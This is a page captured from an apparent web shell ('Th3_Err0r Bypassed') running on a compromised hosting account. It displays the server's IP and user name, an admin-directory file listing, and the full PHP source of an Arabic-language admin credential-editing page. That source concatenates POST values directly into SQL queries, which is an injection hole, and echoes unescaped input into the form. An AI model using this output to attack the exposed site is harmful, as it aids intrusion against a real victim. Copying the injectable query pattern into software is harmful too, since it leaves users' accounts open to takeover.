[ Th3_Err0r Bypassed ]

Upload:

Command:

liwaavux@216.73.217.165: ~ $ 
<?php
ob_start();
session_start();
$pageTitle = ' تعديل بيانات الحساب ';
include 'init.php';
?>
<?php 
if(isset($_SESSION['user_liwwan_admin_2023930']) AND ($_SESSION['type'] == "manager_session_alliwan") ){
?>

<?php 
    if (($_SERVER['REQUEST_METHOD'] == 'POST') && isset($_POST['do_edit_mypass'])) {
        // [DO_3] DO EDIT CHARITY PASS

    $adminid           = $_POST["admin_id"];
    $oldpassword       = $_POST['oldpass'];
    $msg='';

    $hashpass       = $admin['password'];

        
    $fname = $_POST['adfullname'];
    $nname = $_POST['adusername'];
    $npaas = $_POST['newpass'];
    $chahashpass     = password_hash($npaas, PASSWORD_ARGON2I);

    $stmt = $conn->prepare("UPDATE 
                                 royaladmin 
                                 SET
                                 fullname      = ?,
                                 username      = ?,
                                 password      = ?
                                 WHERE
                                 adminid  = $adminid");
    $stmt->execute(array($fname,$nname,$chahashpass));  
    $_SESSION['user_liwwan_admin_2023930'] = $_POST['adfullname'];
        header('location:admins.php');
        exit();

}?>
<?php
 $adminid     = $_POST["ad_id"];
$stb = $conn->prepare("SELECT username,fullname FROM royaladmin WHERE adminid= $adminid ");
$stb->execute();
$admininfo = $stb->Fetch();
?>
<section class="add_my">
        <form action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST" class="form mt-5">
            <p class="text-center h3 fw-bold text-center form_tittle"> تعديل إسم المستخدم و كلمة المرور للحساب </p>
            <div class="ermsg">
            <?php if(!empty($msg)) { 
                echo '<hr>' . '<div class="bg-danger text-white py-3 px-1 rounded-2 text-center fw-bold">';
                echo $msg . '<br>';
                echo '</div>' . '<hr>'; }?>
            </div>
            <hr class="my-1">
            <div class="row">
                <div class="col-lg-12 col-sm-12 my-2 text-center">
                    <div class="upload_img_benfs w-50 m-auto">
                        <label for="ordertitle" class="text-primary fw-bold text-center"> إسم المستخدم  <i class="fa-solid fa-asterisk px-2 text-danger"></i></label>
                        <input type="text" class="w-100 text-muted text-end fw-bold py-3" name="adusername" value="<?php echo $admininfo['username']  ?>" required="required" id="ordertitle"/> 
                    </div>
                </div>
                <hr>
                <div class="col-lg-12 col-sm-12 my-2 text-center">
                    <div class="upload_img_benfs w-50 m-auto">
                        <input type="hidden" name="admin_id" value="<?php echo $_POST["ad_id"]; ?>">
                        <label for="ordertitle" class="text-primary fw-bold text-center"> الإسم الكامل  <i class="fa-solid fa-asterisk px-2 text-danger"></i></label>
                        <input type="text" class="w-100 text-muted text-end fw-bold py-3" name="adfullname" value="<?php echo $admininfo['fullname']  ?>" required="required" id="ordertitle"/> 
                    </div>
                </div>
                <hr>
                <div class="col-lg-12 col-sm-12 my-2 text-center">
                    <div class="upload_img_benfs w-50 m-auto">
                        <label for="ordertitle" class="text-primary fw-bold text-center"> إختر كلمة المرور الجديدة  <i class="fa-solid fa-asterisk px-2 text-danger"></i></label>
                        <input type="password" class="w-100 text-muted text-end fw-bold py-3" name="newpass" required="required" id="ordertitle"/> 
                    </div>
                </div>
            </div>
            <div class="row">
                <hr class="my-4">
                <div class="col-12">
                <button class="btn btn-primary conf_btn px-4" name="do_edit_mypass" type="submit" onclick="return confirm('متأكد من الرغبة بتعديل إسم المستخدم و كلمة المرور لهذا الحساب ؟');"> تأكيد </button>
                </div>
            </div>  
        </form>
</section>

<?php 
}else{
header('Location:index.php');
exit;
}
?>
<?php
include 'assets/includes/template/footer.php';
ob_end_flush();

Filemanager

DIR : / home/ liwaavux/ public_html/ admin/
Name Type Size Permission Actions
assets Folder 0755
images Folder 0755
ac_citycalc.php File 15.27 KB 0644
ac_edit_admin.php File 2.67 KB 0644
ac_edit_admininfo.php File 4.36 KB 0644
ac_edit_imgs.php File 34.27 KB 0644
ac_edit_pr.php File 10.72 KB 0644
ac_projects.php File 5.24 KB 0644
ac_workshops.php File 18.62 KB 0644
add_admin.php File 4.32 KB 0644
add_customer_template.php File 11.1 KB 0644
add_project.php File 17.22 KB 0644
add_workshop.php File 5.15 KB 0644
admins.php File 4.81 KB 0644
citycalc.php File 5.01 KB 0644
cons_orders.php File 4.51 KB 0644
custommer_templates.php File 4.59 KB 0644
dashboard.php File 4.11 KB 0644
edit_cus_template.php File 11.74 KB 0644
editadminpassword.php File 5.17 KB 0644
error_log File 309.84 KB 0644
imgs.php File 18.17 KB 0644
index.php File 3.19 KB 0644
init.php File 183 B 0644
logout.php File 186 B 0644
newsletter.php File 3.13 KB 0644
projects.php File 13.89 KB 0644
projects_card.php File 13.29 KB 0644
show.php File 8.81 KB 0644
workshop_details.php File 12.08 KB 0644
workshops.php File 4.63 KB 0644

© 2026 Coded By Th3_Err0r Code.